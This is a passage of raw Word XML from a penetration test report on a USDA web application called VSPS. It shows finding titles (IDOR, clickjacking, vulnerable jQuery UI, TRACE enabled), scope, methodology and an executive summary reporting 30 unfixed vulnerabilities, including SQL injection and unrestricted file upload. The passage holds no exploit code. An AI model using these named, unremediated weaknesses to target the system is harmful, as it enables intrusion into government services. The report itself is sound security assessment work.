            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Protecti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...</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FB86F1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4576C3D3"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64F3C4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21. Insecure Direct Object Reference (IDOR) Leading to...</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4E878FF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2D7A3025"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84352C9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22. Sensitive Data Exposure in URL (GET Request for Cr...</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9CBE0C1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1FDD34F2"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395C1B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23. Missing X-Frame-Options Header (Clickjacking)</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35BE95" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="66611214"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44E117" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>24. Unrestricted Access to HTTP Service (Port 80)</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17BD32B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="628C5D78"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4FF73F7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>25. Information Disclosure via Oracle Reports Error Me...</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7109762" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="53CD56F3"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EAC0C0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">26. Vulnerable Component: jQuery UI Cross-Site </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scripti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...</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1F15EC3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4F9642CE"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8D88B7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>27. Use of Vulnerable Component: jQuery UI 1.12.1</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C27F30" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3876728C"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28DC807" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>28. HTTP TRACE/TRACK Method Enabled</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43FA3AA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="522FE780"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152AC5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>29. Missing Secure Flag for Cookies</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E168D19" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="187AEF9C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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2D0F72A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>30. Cacheable HTTPS Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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5A6BBAE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F46EEA4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DE18C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Document Control</w:t>
      </w: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3"/>
        <w:gridCol w:w="1803"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="3606"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="68678A8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40274C7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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D46C39F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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ECB6F9E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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D85FDD5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2D34F77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73B2993" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.1</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3B6CAE3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-12-01</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692422D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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4019EC6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Draft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="77B5ABC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4062210" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.9</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A55A27E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-12-05</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479E15" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0884B18" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technical Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="59B28AC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F8C3695" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1.0</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116AFA6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-12-10</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E5D2BA7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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606FEC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Final Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31839AB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="600"/>
      </w:pPr>
      <w:r>
        <w:t>Scope of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D21EF7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>In-Scope Assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FAB915" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• VSPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B1BD1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Out-of-Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186FBD0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• Payment Gateway GOV (Third Party)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12774111" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• Other Apps hosted in the same ENV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407EF3D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F71A444" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The assessment followed the PTES (Penetration Testing Execution Standard) framework. Testing was performed using a combination of automated scanning (Burp Suite Pro) and manual exploitation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B7ABE2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249B525" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7478D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report presents the findings of the penetration test conducted for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USDA MRP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A total of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>30 vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> were identified, with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F1D1D"/>
        </w:rPr>
        <w:t>5 critical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>19 high</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> severity issues requiring immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240B07B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Key Metrics Dashboard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6"/>
        <w:gridCol w:w="2256"/>
        <w:gridCol w:w="2257"/>
        <w:gridCol w:w="2257"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="209BCCC4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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66BF4ABA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>RISK LEVEL HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F46E5"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53A2BEED" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>AVG CVSS 7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="64748B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25835F85" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MAX CVSS 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="16A34A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BF4277D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>FIXED 0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="140B3354" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Insights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCD2DE" w14:textId="20127707" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The security assessment of the USDA MRP VSPS Web Application revealed a critical risk posture, with numerous high-severity vulnerabilities across the system. These findings, identified during the period of November 24 to December 5, 2025, indicate significant weaknesses in the application's design, configuration, and underlying components. The presence of five critical and nineteen high-severity issues poses a substantial threat to the integrity, confidentiality, and availability of sensitive government data and critical business operations. Failure to address these vulnerabilities could lead to severe operational disruptions, unauthorized data manipulation or disclosure, and significant reputational damage. Immediate and strategic actions are required to mitigate these risks and safeguard the VSPS </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application. The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> assessment highlights a pressing need for a comprehensive overhaul of security practices within the VSPS development and operational lifecycle. The identified vulnerabilities, particularly those allowing arbitrary code execution and unauthorized access, expose the USDA MRP to advanced persistent threats and potential compromise of its mission-critical data. Addressing these issues is not merely a technical exercise but a strategic imperative to protect public trust and ensure continuous, secure delivery of government services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F24EB6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Key Business Risks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C28191" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• Data Breach and Confidentiality Loss: Critical vulnerabilities such as SQL Injection and sensitive data exposure could lead to unauthorized access and exfiltration of sensitive government data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F195A2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• System Compromise and Operational Disruption: Unrestricted file uploads and missing authorization controls enable attackers to gain control over the application, disrupting vital services and data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306284B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>• Reputational Damage and Loss of Public Trust: A successful cyberattack exploiting these vulnerabilities could severely damage the USDA's reputation, eroding public confidence in its ability to protect information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4480D0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
